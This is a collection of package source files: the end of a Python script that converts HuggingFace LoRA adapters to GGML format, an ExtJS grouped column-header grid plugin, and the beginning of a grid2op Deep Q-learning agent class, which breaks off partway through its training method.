match = re.match(r".*layers\.(\d+)\.(\w+\.\w+)\.lora_(A|B)\.weight", t)
if match:
nn = match.group(1)
sub_layer = match.group(2)
lora_type = match.group(3)
sub_layer_renamed = HF_SUBLAYER_TO_GGML.get(sub_layer)
if sub_layer_renamed is None:
print(f"Error: unrecognized sub-layer {sub_layer} in tensor {t}")
sys.exit(1)
output_string = (
f"layers.{nn}.{HF_SUBLAYER_TO_GGML[sub_layer]}.weight.lora"
)
return (output_string, lora_type)
else:
print(f"Error: unrecognized tensor {t}")
sys.exit(1)
def write_file_header(fout: BufferedWriter, _params: Mapping[str, Any]) -> None:
fout.write(b"ggla"[::-1]) # magic (ggml lora)
fout.write(struct.pack("i", 1)) # file version
# fout.write(struct.pack("ii", params["r"], params["lora_alpha"]))
def write_tensor_header(
fout: BufferedWriter, name: str, shape: Sequence[int], data_type: DataType
) -> None:
sname = bytes(name, 'utf-8')
fout.write(
struct.pack(
"iii",
len(shape),
len(sname),
DATA_TYPE_TO_FTYPE[NUMPY_TYPE_TO_DATA_TYPE[data_type]],
)
)
fout.write(struct.pack("i" * len(shape), *shape[::-1]))
fout.write(sname)
fout.seek((fout.tell() + 31) & -32)
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser()
parser.add_argument(
"path",
type=str,
help="Path must contain HuggingFace PEFT LoRA files 'adapter_config.json' and 'adapter_model.bin'",
)
parser.add_argument(
'-t',
'--dtype',
choices=['fp16', 'fp32'],
default='fp32',
help='Data type to use for the converted model. Default: %(default)s',
dest='dtype',
)
return parser.parse_args(sys.argv[1:])
def read_params(input_json: str) -> Mapping[str, Any]:
params: MutableMapping[str, Any] = {}
with open(input_json, "r") as f:
params = json.load(f)
if params["peft_type"] != "LORA":
print(f"Error: unsupported adapter type {params['peft_type']}, expected LORA")
sys.exit(1)
if params["fan_in_fan_out"] == True:
print("Error: param fan_in_fan_out is not supported")
sys.exit(1)
if params["bias"] is not None and params["bias"] != "none":
print("Error: param bias is not supported")
sys.exit(1)
# TODO: these seem to be layers that have been trained but without lora.
# doesn't seem widely used but eventually should be supported
if params["modules_to_save"] is not None and len(params["modules_to_save"]) > 0:
print("Error: param modules_to_save is not supported")
sys.exit(1)
return params
def normalize_tensors(model: Any, params: Mapping[str, Any]) -> Mapping[str, Tuple[torch.Tensor, str]]:
r = float(params["r"])
lora_alpha = float(params["lora_alpha"])
scale = lora_alpha / r
tensor_map: MutableMapping[str, Tuple[torch.Tensor, str]] = {}
for k, v in model.items():
if k.endswith("lora_A.weight"):
if v.dtype != torch.float16 and v.dtype != torch.float32:
v = v.float()
else:
v = v.float()
(tensor_name, type) = translate_tensor_name(k)
if tensor_name in tensor_map:
(old_tensor, old_type) = tensor_map[tensor_name]
new_tensor = torch.matmul(v, old_tensor) if old_type == 'A' else torch.matmul(old_tensor, v)
new_tensor = new_tensor * scale
tensor_map[tensor_name] = (new_tensor, "")
else:
tensor_map[tensor_name] = (v, type)
return tensor_map
def main() -> None:
args = parse_args()
input_json = os.path.join(args.path, "adapter_config.json")
input_model = os.path.join(args.path, "adapter_model.bin")
output_path = os.path.join(sys.argv[1], "ggml-adapter-model.bin")
params = read_params(input_json)
model = torch.load(input_model, map_location="cpu")
print("Normalizing tensors...")
tensor_map = normalize_tensors(model, params)
print("Normalization completed.\nWriting output...")
with open(output_path, "wb") as fout:
fout.truncate()
write_file_header(fout, params)
for tname, (v, ltype) in tensor_map.items():
if ltype != "":
continue
if args.dtype == 'fp16':
t = v.half().numpy()
else:
t = v.numpy()
print(f"{tname} {t.shape} {t.dtype} {t.nbytes/1024/1024:.2f}MB")
write_tensor_header(fout, tname, t.shape, t.dtype)
t.tofile(fout)
print(f"Converted {input_json} and {input_model} to {output_path}")
if __name__ == '__main__':
main() | PypiClean |
/collective.js.extjs-1.4.0.tar.gz/collective.js.extjs-1.4.0/collective/js/extjs/resources/ux/ColumnHeaderGroup.js | Ext.ns('Ext.ux.grid');
Ext.ux.grid.ColumnHeaderGroup = Ext.extend(Ext.util.Observable, {
constructor: function(config){
this.config = config;
},
init: function(grid){
Ext.applyIf(grid.colModel, this.config);
Ext.apply(grid.getView(), this.viewConfig);
},
viewConfig: {
initTemplates: function(){
this.constructor.prototype.initTemplates.apply(this, arguments);
var ts = this.templates || {};
if(!ts.gcell){
ts.gcell = new Ext.XTemplate('<td class="x-grid3-hd x-grid3-gcell x-grid3-td-{id} ux-grid-hd-group-row-{row} {cls}" style="{style}">', '<div {tooltip} class="x-grid3-hd-inner x-grid3-hd-{id}" unselectable="on" style="{istyle}">', this.grid.enableHdMenu ? '<a class="x-grid3-hd-btn" href="#"></a>' : '', '{value}</div></td>');
}
this.templates = ts;
this.hrowRe = new RegExp("ux-grid-hd-group-row-(\\d+)", "");
},
renderHeaders: function(){
var ts = this.templates, headers = [], cm = this.cm, rows = cm.rows, tstyle = 'width:' + this.getTotalWidth() + ';';
for(var row = 0, rlen = rows.length; row < rlen; row++){
var r = rows[row], cells = [];
for(var i = 0, gcol = 0, len = r.length; i < len; i++){
var group = r[i];
group.colspan = group.colspan || 1;
var id = this.getColumnId(group.dataIndex ? cm.findColumnIndex(group.dataIndex) : gcol), gs = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupStyle.call(this, group, gcol);
cells[i] = ts.gcell.apply({
cls: 'ux-grid-hd-group-cell',
id: id,
row: row,
style: 'width:' + gs.width + ';' + (gs.hidden ? 'display:none;' : '') + (group.align ? 'text-align:' + group.align + ';' : ''),
tooltip: group.tooltip ? (Ext.QuickTips.isEnabled() ? 'ext:qtip' : 'title') + '="' + group.tooltip + '"' : '',
istyle: group.align == 'right' ? 'padding-right:16px' : '',
btn: this.grid.enableHdMenu && group.header,
value: group.header || ' '
});
gcol += group.colspan;
}
headers[row] = ts.header.apply({
tstyle: tstyle,
cells: cells.join('')
});
}
headers.push(this.constructor.prototype.renderHeaders.apply(this, arguments));
return headers.join('');
},
onColumnWidthUpdated: function(){
this.constructor.prototype.onColumnWidthUpdated.apply(this, arguments);
Ext.ux.grid.ColumnHeaderGroup.prototype.updateGroupStyles.call(this);
},
onAllColumnWidthsUpdated: function(){
this.constructor.prototype.onAllColumnWidthsUpdated.apply(this, arguments);
Ext.ux.grid.ColumnHeaderGroup.prototype.updateGroupStyles.call(this);
},
onColumnHiddenUpdated: function(){
this.constructor.prototype.onColumnHiddenUpdated.apply(this, arguments);
Ext.ux.grid.ColumnHeaderGroup.prototype.updateGroupStyles.call(this);
},
getHeaderCell: function(index){
return this.mainHd.query(this.cellSelector)[index];
},
findHeaderCell: function(el){
return el ? this.fly(el).findParent('td.x-grid3-hd', this.cellSelectorDepth) : false;
},
findHeaderIndex: function(el){
var cell = this.findHeaderCell(el);
return cell ? this.getCellIndex(cell) : false;
},
updateSortIcon: function(col, dir){
var sc = this.sortClasses, hds = this.mainHd.select(this.cellSelector).removeClass(sc);
hds.item(col).addClass(sc[dir == "DESC" ? 1 : 0]);
},
handleHdDown: function(e, t){
var el = Ext.get(t);
if(el.hasClass('x-grid3-hd-btn')){
e.stopEvent();
var hd = this.findHeaderCell(t);
Ext.fly(hd).addClass('x-grid3-hd-menu-open');
var index = this.getCellIndex(hd);
this.hdCtxIndex = index;
var ms = this.hmenu.items, cm = this.cm;
ms.get('asc').setDisabled(!cm.isSortable(index));
ms.get('desc').setDisabled(!cm.isSortable(index));
this.hmenu.on('hide', function(){
Ext.fly(hd).removeClass('x-grid3-hd-menu-open');
}, this, {
single: true
});
this.hmenu.show(t, 'tl-bl?');
}else if(el.hasClass('ux-grid-hd-group-cell') || Ext.fly(t).up('.ux-grid-hd-group-cell')){
e.stopEvent();
}
},
handleHdMove: function(e, t){
var hd = this.findHeaderCell(this.activeHdRef);
if(hd && !this.headersDisabled && !Ext.fly(hd).hasClass('ux-grid-hd-group-cell')){
var hw = this.splitHandleWidth || 5, r = this.activeHdRegion, x = e.getPageX(), ss = hd.style, cur = '';
if(this.grid.enableColumnResize !== false){
if(x - r.left <= hw && this.cm.isResizable(this.activeHdIndex - 1)){
cur = Ext.isAir ? 'move' : Ext.isWebKit ? 'e-resize' : 'col-resize'; // col-resize
// not
// always
// supported
}else if(r.right - x <= (!this.activeHdBtn ? hw : 2) && this.cm.isResizable(this.activeHdIndex)){
cur = Ext.isAir ? 'move' : Ext.isWebKit ? 'w-resize' : 'col-resize';
}
}
ss.cursor = cur;
}
},
handleHdOver: function(e, t){
var hd = this.findHeaderCell(t);
if(hd && !this.headersDisabled){
this.activeHdRef = t;
this.activeHdIndex = this.getCellIndex(hd);
var fly = this.fly(hd);
this.activeHdRegion = fly.getRegion();
if(!(this.cm.isMenuDisabled(this.activeHdIndex) || fly.hasClass('ux-grid-hd-group-cell'))){
fly.addClass('x-grid3-hd-over');
this.activeHdBtn = fly.child('.x-grid3-hd-btn');
if(this.activeHdBtn){
this.activeHdBtn.dom.style.height = (hd.firstChild.offsetHeight - 1) + 'px';
}
}
}
},
handleHdOut: function(e, t){
var hd = this.findHeaderCell(t);
if(hd && (!Ext.isIE || !e.within(hd, true))){
this.activeHdRef = null;
this.fly(hd).removeClass('x-grid3-hd-over');
hd.style.cursor = '';
}
},
handleHdMenuClick: function(item){
var index = this.hdCtxIndex, cm = this.cm, ds = this.ds, id = item.getItemId();
switch(id){
case 'asc':
ds.sort(cm.getDataIndex(index), 'ASC');
break;
case 'desc':
ds.sort(cm.getDataIndex(index), 'DESC');
break;
default:
if(id.substr(0, 6) == 'group-'){
var i = id.split('-'), row = parseInt(i[1], 10), col = parseInt(i[2], 10), r = this.cm.rows[row], group, gcol = 0;
for(var i = 0, len = r.length; i < len; i++){
group = r[i];
if(col >= gcol && col < gcol + group.colspan){
break;
}
gcol += group.colspan;
}
if(item.checked){
var max = cm.getColumnsBy(this.isHideableColumn, this).length;
for(var i = gcol, len = gcol + group.colspan; i < len; i++){
if(!cm.isHidden(i)){
max--;
}
}
if(max < 1){
this.onDenyColumnHide();
return false;
}
}
for(var i = gcol, len = gcol + group.colspan; i < len; i++){
if(cm.config[i].fixed !== true && cm.config[i].hideable !== false){
cm.setHidden(i, item.checked);
}
}
}else if(id.substr(0, 4) == 'col-'){
index = cm.getIndexById(id.substr(4));
if(index != -1){
if(item.checked && cm.getColumnsBy(this.isHideableColumn, this).length <= 1){
this.onDenyColumnHide();
return false;
}
cm.setHidden(index, item.checked);
}
}
if(id.substr(0, 6) == 'group-' || id.substr(0, 4) == 'col-'){
item.checked = !item.checked;
if(item.menu){
var updateChildren = function(menu){
menu.items.each(function(childItem){
if(!childItem.disabled){
childItem.setChecked(item.checked, false);
if(childItem.menu){
updateChildren(childItem.menu);
}
}
});
}
updateChildren(item.menu);
}
var parentMenu = item, parentItem;
while(parentMenu = parentMenu.parentMenu){
if(!parentMenu.parentMenu || !(parentItem = parentMenu.parentMenu.items.get(parentMenu.getItemId())) || !parentItem.setChecked){
break;
}
var checked = parentMenu.items.findIndexBy(function(m){
return m.checked;
}) >= 0;
parentItem.setChecked(checked, true);
}
item.checked = !item.checked;
}
}
return true;
},
beforeColMenuShow: function(){
var cm = this.cm, rows = this.cm.rows;
this.colMenu.removeAll();
for(var col = 0, clen = cm.getColumnCount(); col < clen; col++){
var menu = this.colMenu, title = cm.getColumnHeader(col), text = [];
if(cm.config[col].fixed !== true && cm.config[col].hideable !== false){
for(var row = 0, rlen = rows.length; row < rlen; row++){
var r = rows[row], group, gcol = 0;
for(var i = 0, len = r.length; i < len; i++){
group = r[i];
if(col >= gcol && col < gcol + group.colspan){
break;
}
gcol += group.colspan;
}
if(group && group.header){
if(cm.hierarchicalColMenu){
var gid = 'group-' + row + '-' + gcol,
item = menu.items ? menu.getComponent(gid) : null,
submenu = item ? item.menu : null;
if(!submenu){
submenu = new Ext.menu.Menu({
itemId: gid
});
submenu.on("itemclick", this.handleHdMenuClick, this);
var checked = false, disabled = true;
for(var c = gcol, lc = gcol + group.colspan; c < lc; c++){
if(!cm.isHidden(c)){
checked = true;
}
if(cm.config[c].hideable !== false){
disabled = false;
}
}
menu.add({
itemId: gid,
text: group.header,
menu: submenu,
hideOnClick: false,
checked: checked,
disabled: disabled
});
}
menu = submenu;
}else{
text.push(group.header);
}
}
}
text.push(title);
menu.add(new Ext.menu.CheckItem({
itemId: "col-" + cm.getColumnId(col),
text: text.join(' '),
checked: !cm.isHidden(col),
hideOnClick: false,
disabled: cm.config[col].hideable === false
}));
}
}
},
afterRenderUI: function(){
this.constructor.prototype.afterRenderUI.apply(this, arguments);
Ext.apply(this.columnDrop, Ext.ux.grid.ColumnHeaderGroup.prototype.columnDropConfig);
Ext.apply(this.splitZone, Ext.ux.grid.ColumnHeaderGroup.prototype.splitZoneConfig);
}
},
splitZoneConfig: {
allowHeaderDrag: function(e){
return !e.getTarget(null, null, true).hasClass('ux-grid-hd-group-cell');
}
},
columnDropConfig: {
getTargetFromEvent: function(e){
var t = Ext.lib.Event.getTarget(e);
return this.view.findHeaderCell(t);
},
positionIndicator: function(h, n, e){
var data = Ext.ux.grid.ColumnHeaderGroup.prototype.getDragDropData.call(this, h, n, e);
if(data === false){
return false;
}
var px = data.px + this.proxyOffsets[0];
this.proxyTop.setLeftTop(px, data.r.top + this.proxyOffsets[1]);
this.proxyTop.show();
this.proxyBottom.setLeftTop(px, data.r.bottom);
this.proxyBottom.show();
return data.pt;
},
onNodeDrop: function(n, dd, e, data){
var h = data.header;
if(h != n){
var d = Ext.ux.grid.ColumnHeaderGroup.prototype.getDragDropData.call(this, h, n, e);
if(d === false){
return false;
}
var cm = this.grid.colModel, right = d.oldIndex < d.newIndex, rows = cm.rows;
for(var row = d.row, rlen = rows.length; row < rlen; row++){
var r = rows[row], len = r.length, fromIx = 0, span = 1, toIx = len;
for(var i = 0, gcol = 0; i < len; i++){
var group = r[i];
if(d.oldIndex >= gcol && d.oldIndex < gcol + group.colspan){
fromIx = i;
}
if(d.oldIndex + d.colspan - 1 >= gcol && d.oldIndex + d.colspan - 1 < gcol + group.colspan){
span = i - fromIx + 1;
}
if(d.newIndex >= gcol && d.newIndex < gcol + group.colspan){
toIx = i;
}
gcol += group.colspan;
}
var groups = r.splice(fromIx, span);
rows[row] = r.splice(0, toIx - (right ? span : 0)).concat(groups).concat(r);
}
for(var c = 0; c < d.colspan; c++){
var oldIx = d.oldIndex + (right ? 0 : c), newIx = d.newIndex + (right ? -1 : c);
cm.moveColumn(oldIx, newIx);
this.grid.fireEvent("columnmove", oldIx, newIx);
}
return true;
}
return false;
}
},
getGroupStyle: function(group, gcol){
var width = 0, hidden = true;
for(var i = gcol, len = gcol + group.colspan; i < len; i++){
if(!this.cm.isHidden(i)){
var cw = this.cm.getColumnWidth(i);
if(typeof cw == 'number'){
width += cw;
}
hidden = false;
}
}
return {
width: (Ext.isBorderBox || (Ext.isWebKit && !Ext.isSafari2) ? width : Math.max(width - this.borderWidth, 0)) + 'px',
hidden: hidden
};
},
updateGroupStyles: function(col){
var tables = this.mainHd.query('.x-grid3-header-offset > table'), tw = this.getTotalWidth(), rows = this.cm.rows;
for(var row = 0; row < tables.length; row++){
tables[row].style.width = tw;
if(row < rows.length){
var cells = tables[row].firstChild.firstChild.childNodes;
for(var i = 0, gcol = 0; i < cells.length; i++){
var group = rows[row][i];
if((typeof col != 'number') || (col >= gcol && col < gcol + group.colspan)){
var gs = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupStyle.call(this, group, gcol);
cells[i].style.width = gs.width;
cells[i].style.display = gs.hidden ? 'none' : '';
}
gcol += group.colspan;
}
}
}
},
getGroupRowIndex: function(el){
if(el){
var m = el.className.match(this.hrowRe);
if(m && m[1]){
return parseInt(m[1], 10);
}
}
return this.cm.rows.length;
},
getGroupSpan: function(row, col){
if(row < 0){
return {
col: 0,
colspan: this.cm.getColumnCount()
};
}
var r = this.cm.rows[row];
if(r){
for(var i = 0, gcol = 0, len = r.length; i < len; i++){
var group = r[i];
if(col >= gcol && col < gcol + group.colspan){
return {
col: gcol,
colspan: group.colspan
};
}
gcol += group.colspan;
}
return {
col: gcol,
colspan: 0
};
}
return {
col: col,
colspan: 1
};
},
getDragDropData: function(h, n, e){
if(h.parentNode != n.parentNode){
return false;
}
var cm = this.grid.colModel, x = Ext.lib.Event.getPageX(e), r = Ext.lib.Dom.getRegion(n.firstChild), px, pt;
if((r.right - x) <= (r.right - r.left) / 2){
px = r.right + this.view.borderWidth;
pt = "after";
}else{
px = r.left;
pt = "before";
}
var oldIndex = this.view.getCellIndex(h), newIndex = this.view.getCellIndex(n);
if(cm.isFixed(newIndex)){
return false;
}
var row = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupRowIndex.call(this.view, h),
oldGroup = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupSpan.call(this.view, row, oldIndex),
newGroup = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupSpan.call(this.view, row, newIndex),
oldIndex = oldGroup.col;
newIndex = newGroup.col + (pt == "after" ? newGroup.colspan : 0);
if(newIndex >= oldGroup.col && newIndex <= oldGroup.col + oldGroup.colspan){
return false;
}
var parentGroup = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupSpan.call(this.view, row - 1, oldIndex);
if(newIndex < parentGroup.col || newIndex > parentGroup.col + parentGroup.colspan){
return false;
}
return {
r: r,
px: px,
pt: pt,
row: row,
oldIndex: oldIndex,
newIndex: newIndex,
colspan: oldGroup.colspan
};
}
}); | PypiClean |
/l2rpn_baselines-0.8.0.tar.gz/l2rpn_baselines-0.8.0/l2rpn_baselines/utils/deepQAgent.py |
import os
import warnings
import numpy as np
from tqdm import tqdm
from grid2op.Exceptions import Grid2OpException
from grid2op.Agent import AgentWithConverter
from grid2op.Converter import IdToAct
from l2rpn_baselines.utils.replayBuffer import ReplayBuffer
from l2rpn_baselines.utils.trainingParam import TrainingParam
try:
from grid2op.Chronics import MultifolderWithCache
_CACHE_AVAILABLE_DEEPQAGENT = True
except ImportError:
_CACHE_AVAILABLE_DEEPQAGENT = False
try:
import tensorflow as tf
_CAN_USE_TENSORFLOW = True
except ImportError:
_CAN_USE_TENSORFLOW = False
class DeepQAgent(AgentWithConverter):
"""
This class allows to train and log the training of different Q learning algorithm.
.. warning::
This baseline recodes entire the RL training procedure. You can use it if you
want to have a deeper look at Deep Q Learning algorithm and a possible (non
optimized, slow, etc. implementation ).
For a much better implementation, you can reuse the code of "PPO_RLLIB"
or the "PPO_SB3" baseline.
Prefer to use the :class:`GymAgent` class and the :class:`GymEnvWithHeuristics`
classes to train agent interacting with grid2op and fully compatible
with gym framework.
It is not meant to be the state of the art implement of some baseline. It is rather meant to be a set of
useful functions that allows to easily develop an environment if we want to get started in RL using grid2op.
It derives from :class:`grid2op.Agent.AgentWithConverter` and as such implements the :func:`DeepQAgent.convert_obs`
and :func:`DeepQAgent.my_act`
It is suppose to be a Baseline, so it implements also the
- :func:`DeepQAgent.load`: to load the agent
- :func:`DeepQAgent.save`: to save the agent
- :func:`DeepQAgent.train`: to train the agent
TODO description of the training scheme!
Attributes
----------
filter_action_fun: ``callable``
The function used to filter the action of the action space. See the documentation of grid2op:
:class:`grid2op.Converter.IdToAct`
`here <https://grid2op.readthedocs.io/en/v0.9.3/converter.html#grid2op.Converter.IdToAct>`_ for more
information.
replay_buffer:
The experience replay buffer
deep_q: :class:`BaseDeepQ`
The neural network, represented as a :class:`BaseDeepQ` object.
name: ``str``
The name of the Agent
store_action: ``bool``
Whether you want to register which action your agent took or not. Saving the action can slow down a bit
the computation (less than 1%) but can help understand what your agent is doing during its learning process.
dict_action: ``str``
The action taken by the agent, represented as a dictionnary. This can be useful to know which type of actions
is taken by your agent. Only filled if :attr:DeepQAgent.store_action` is ``True``
istraining: ``bool``
Whether you are training this agent or not. No more really used. Mainly used for backward compatibility.
epsilon: ``float``
The epsilon greedy exploration parameter.
nb_injection: ``int``
Number of action tagged as "injection". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_voltage: ``int``
Number of action tagged as "voltage". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_topology: ``int``
Number of action tagged as "topology". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_redispatching: ``int``
Number of action tagged as "redispatching". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_storage: ``int``
Number of action tagged as "storage". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_curtail: ``int``
Number of action tagged as "curtailment". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_do_nothing: ``int``
Number of action tagged as "do_nothing", *ie* when an action is not modifiying the state of the grid. See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
verbose: ``bool``
An effort will be made on the logging (outside of trensorboard) of the training. For now: verbose=True will
allow some printing on the command prompt, and verbose=False will drastically reduce the amount of information
printed during training.
"""
def __init__(self,
action_space,
nn_archi,
name="DeepQAgent",
store_action=True,
istraining=False,
filter_action_fun=None,
verbose=False,
observation_space=None,
**kwargs_converters):
if not _CAN_USE_TENSORFLOW:
raise RuntimeError("Cannot import tensorflow, this function cannot be used.")
AgentWithConverter.__init__(self, action_space, action_space_converter=IdToAct, **kwargs_converters)
self.filter_action_fun = filter_action_fun
if self.filter_action_fun is not None:
self.action_space.filter_action(self.filter_action_fun)
# and now back to the origin implementation
self.replay_buffer = None
self.__nb_env = None
self.deep_q = None
self._training_param = None
self._tf_writer = None
self.name = name
self._losses = None
self.__graph_saved = False
self.store_action = store_action
self.dict_action = {}
self.istraining = istraining
self.epsilon = 1.0
# for tensorbaord
self._train_lr = None
self._reset_num = None
self._max_iter_env_ = 1000000
self._curr_iter_env = 0
self._max_reward = 0.
# action type
self.nb_injection = 0
self.nb_voltage = 0
self.nb_topology = 0
self.nb_line = 0
self.nb_redispatching = 0
self.nb_curtail = 0
self.nb_storage = 0
self.nb_do_nothing = 0
# for over sampling the hard scenarios
self._prev_obs_num = 0
self._time_step_lived = None
self._nb_chosen = None
self._proba = None
self._prev_id = 0
# this is for the "limit the episode length" depending on your previous success
self._total_sucesses = 0
# neural network architecture
self._nn_archi = nn_archi
# observation tranformers
self._obs_as_vect = None
self._tmp_obs = None
self._indx_obs = None
self.verbose = verbose
if observation_space is None:
pass
else:
self.init_obs_extraction(observation_space)
# for the frequency of action type
self.current_ = 0
self.nb_ = 10
self._nb_this_time = np.zeros((self.nb_, 8), dtype=int)
#
self._vector_size = None
self._actions_per_ksteps = None
self._illegal_actions_per_ksteps = None
self._ambiguous_actions_per_ksteps = None
def _fill_vectors(self, training_param):
self._vector_size = self.nb_ * training_param.update_tensorboard_freq
self._actions_per_ksteps = np.zeros((self._vector_size, self.action_space.size()), dtype=np.int)
self._illegal_actions_per_ksteps = np.zeros(self._vector_size, dtype=np.int)
self._ambiguous_actions_per_ksteps = np.zeros(self._vector_size, dtype=np.int)
# grid2op.Agent interface
def convert_obs(self, observation):
"""
Generic way to convert an observation. This transform it to a vector and the select the attributes that were
selected in :attr:`l2rpn_baselines.utils.NNParams.list_attr_obs` (that have been extracted once and for all
in the :attr:`DeepQAgent._indx_obs` vector).
Parameters
----------
observation: :class:`grid2op.Observation.BaseObservation`
The current observation sent by the environment
Returns
-------
_tmp_obs: ``numpy.ndarray``
The observation as vector with only the proper attribute selected (TODO scaling will be available
in future version)
"""
obs_as_vect = observation.to_vect()
self._tmp_obs[:] = obs_as_vect[self._indx_obs]
return self._tmp_obs
def my_act(self, transformed_observation, reward, done=False):
"""
This function will return the action (its id) selected by the underlying :attr:`DeepQAgent.deep_q` network.
Before being used, this method require that the :attr:`DeepQAgent.deep_q` is created. To that end a call
to :func:`DeepQAgent.init_deep_q` needs to have been performed (this is automatically done if you use
baseline we provide and their `evaluate` and `train` scripts).
Parameters
----------
transformed_observation: ``numpy.ndarray``
The observation, as transformed after :func:`DeepQAgent.convert_obs`
reward: ``float``
The reward of the last time step. Ignored by this method. Here for retro compatibility with openAI
gym interface.
done: ``bool``
Whether the episode is over or not. This is not used, and is only present to be compliant with
open AI gym interface
Returns
-------
res: ``int``
The id the action taken.
"""
predict_movement_int, *_ = self.deep_q.predict_movement(transformed_observation,
epsilon=0.0,
training=False)
res = int(predict_movement_int)
self._store_action_played(res)
return res
@staticmethod
def get_action_size(action_space, filter_fun, kwargs_converters):
"""
This function allows to get the size of the action space if we were to built a :class:`DeepQAgent`
with this parameters.
Parameters
----------
action_space: :class:`grid2op.ActionSpace`
The grid2op action space used.
filter_fun: ``callable``
see :attr:`DeepQAgent.filter_fun` for more information
kwargs_converters: ``dict``
see the documentation of grid2op for more information:
`here <https://grid2op.readthedocs.io/en/v0.9.3/converter.html?highlight=idToAct#grid2op.Converter.IdToAct.init_converter>`_
See Also
--------
The official documentation of grid2Op, and especially its class "IdToAct" at this address
`IdToAct <https://grid2op.readthedocs.io/en/v0.9.3/converter.html?highlight=idToAct#grid2op.Converter.IdToAct>`_
"""
converter = IdToAct(action_space)
converter.init_converter(**kwargs_converters)
if filter_fun is not None:
converter.filter_action(filter_fun)
return converter.n
def init_obs_extraction(self, observation_space):
"""
This method should be called to initialize the observation (feed as a vector in the neural network)
from its description as a list of its attribute names.
"""
tmp = np.zeros(0, dtype=np.uint) # TODO platform independant
for obs_attr_name in self._nn_archi.get_obs_attr():
beg_, end_, dtype_ = observation_space.get_indx_extract(obs_attr_name)
tmp = np.concatenate((tmp, np.arange(beg_, end_, dtype=np.uint)))
self._indx_obs = tmp
self._tmp_obs = np.zeros((1, tmp.shape[0]), dtype=np.float32)
# baseline interface
def load(self, path):
"""
Part of the l2rpn_baselines interface, this function allows to read back a trained model, to continue the
training or to evaluate its performance for example.
**NB** To reload an agent, it must have exactly the same name and have been saved at the right location.
Parameters
----------
path: ``str``
The path where the agent has previously beens saved.
"""
# not modified compare to original implementation
tmp_me = os.path.join(path, self.name)
if not os.path.exists(tmp_me):
raise RuntimeError("The model should be stored in \"{}\". But this appears to be empty".format(tmp_me))
self._load_action_space(tmp_me)
# TODO handle case where training param class has been overidden
self._training_param = TrainingParam.from_json(os.path.join(tmp_me, "training_params.json".format(self.name)))
self.deep_q = self._nn_archi.make_nn(self._training_param)
try:
self.deep_q.load_network(tmp_me, name=self.name)
except Exception as e:
raise RuntimeError("Impossible to load the model located at \"{}\" with error \n{}".format(path, e))
for nm_attr in ["_time_step_lived", "_nb_chosen", "_proba"]:
conv_path = os.path.join(tmp_me, "{}.npy".format(nm_attr))
if os.path.exists(conv_path):
setattr(self, nm_attr, np.load(file=conv_path))
def save(self, path):
"""
Part of the l2rpn_baselines interface, this allows to save a model. Its name is used at saving time. The
same name must be reused when loading it back.
Parameters
----------
path: ``str``
The path where to save the agent.
"""
if path is not None:
tmp_me = os.path.join(path, self.name)
if not os.path.exists(tmp_me):
os.mkdir(tmp_me)
nm_conv = "action_space.npy"
conv_path = os.path.join(tmp_me, nm_conv)
if not os.path.exists(conv_path):
self.action_space.save(path=tmp_me, name=nm_conv)
self._training_param.save_as_json(tmp_me, name="training_params.json")
self._nn_archi.save_as_json(tmp_me, "nn_architecture.json")
self.deep_q.save_network(tmp_me, name=self.name)
# TODO save the "oversampling" part, and all the other info
for nm_attr in ["_time_step_lived", "_nb_chosen", "_proba"]:
conv_path = os.path.join(tmp_me, "{}.npy".format(nm_attr))
attr_ = getattr(self, nm_attr)
if attr_ is not None:
np.save(arr=attr_, file=conv_path)
def train(self,
env,
iterations,
save_path,
logdir,
training_param=None):
"""
Part of the public l2rpn-baselines interface, this function allows to train the baseline.
If `save_path` is not None, the the model is saved regularly, and also at the end of training.
TODO explain a bit more how you can train it.
Parameters
----------
env: :class:`grid2op.Environment.Environment` or :class:`grid2op.Environment.MultiEnvironment`
The environment used to train your model.
iterations: ``int``
The number of training iteration. NB when reloading a model, this is **NOT** the training steps that will
be used when re training. Indeed, if `iterations` is 1000 and the model was already trained for 750 time
steps, then when reloaded, the training will occur on 250 (=1000 - 750) time steps only.
save_path: ``str``
Location at which to save the model
logdir: ``str``
Location at which tensorboard related information will be kept.
training_param: :class:`l2rpn_baselines.utils.TrainingParam`
The meta parameters for the training procedure. This is currently ignored if the model is reloaded (in that
case the parameters used when first created will be used)
"""
if training_param is None:
training_param = TrainingParam()
self._train_lr = training_param.lr
if self._training_param is None:
self._training_param = training_param
else:
training_param = self._training_param
self._init_deep_q(self._training_param, env)
self._fill_vectors(self._training_param)
self._init_replay_buffer()
# efficient reading of the data (read them by chunk of roughly 1 day
nb_ts_one_day = 24 * 60 / 5 # number of time steps per day
self._set_chunk(env, nb_ts_one_day)
# Create file system related vars
if save_path is not None:
save_path = os.path.abspath(save_path)
os.makedirs(save_path, exist_ok=True)
if logdir is not None:
logpath = os.path.join(logdir, self.name)
self._tf_writer = tf.summary.create_file_writer(logpath, name=self.name)
else:
logpath = None
self._tf_writer = None
UPDATE_FREQ = training_param.update_tensorboard_freq # update tensorboard every "UPDATE_FREQ" steps
SAVING_NUM = training_param.save_model_each
if hasattr(env, "nb_env"):
nb_env = env.nb_env
warnings.warn("Training using {} environments".format(nb_env))
self.__nb_env = nb_env
else:
self.__nb_env = 1
# if isinstance(env, grid2op.Environment.Environment):
# self.__nb_env = 1
# else:
# import warnings
